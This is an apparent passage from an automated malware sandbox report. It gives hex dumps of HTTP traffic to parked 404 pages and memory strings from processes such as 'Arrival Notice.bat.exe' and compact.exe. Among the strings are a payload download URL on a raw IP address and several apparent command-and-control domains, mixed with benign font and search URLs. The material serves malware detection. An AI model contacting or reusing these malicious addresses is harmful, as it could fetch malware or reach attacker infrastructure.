22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:41:51 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:41:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:41:53 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:41:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:41:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Jun 2024 20:42:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: compact.exe, 00000012.00000002.4143560755.000000000263A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.234.72.101/OdR8akYyHwr3ISR.exe
              Source: compact.exe, 00000012.00000002.4143560755.000000000263A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.234.72.101/OdR8akYyHwr3ISR.exej
              Source: compact.exe, 00000012.00000002.4147635781.0000000003B1A000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003BAA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://klimkina.pro/4mpz/?tF1tk6=Y
              Source: runonce.exe, 0000001A.00000002.4147757558.0000000005304000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 0000001B.00000002.4145996724.0000000002F54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3807250320.00000000088A4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://ndhockeyprospects.com/nce6/?QTth=cdSXMBmhjDz&gheP1DX=Ed8kY/rwObA0p5m5nhu
              Source: compact.exe, 00000012.00000002.4147635781.00000000042F4000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004384000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
              Source: Arrival Notice.bat.exe, 00000000.00000002.1707703228.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, dLrZsz.exe, 00000009.00000002.1918612322.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, -6qxw.exe, 00000016.00000002.3127364912.0000000002472000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.
              Source: OdR8akYyHwr3ISR[1].exe.18.dr, -6qxw.exe.18.drString found in binary or memory: http://tempuri.org/DataSet1.xsdSInventory_Management.Properties.Resources
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4147800420.00000000057A4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.leadchanges.info
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4147800420.00000000057A4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.leadchanges.info/mjuo/
              Source: compact.exe, 00000012.00000002.4147635781.0000000004486000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004516000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: Arrival Notice.bat.exe, 00000000.00000002.1732258181.0000000006180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comx6
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: compact.exe, 00000012.00000002.4147635781.0000000004DF2000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004E82000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
              Source: compact.exe, 00000012.00000002.4147635781.0000000004DF2000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004E82000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 0000001B.00000002.4147461137.000000000500C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zonenail.info
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 0000001B.00000002.4147461137.000000000500C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.zonenail.info/kscn/
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
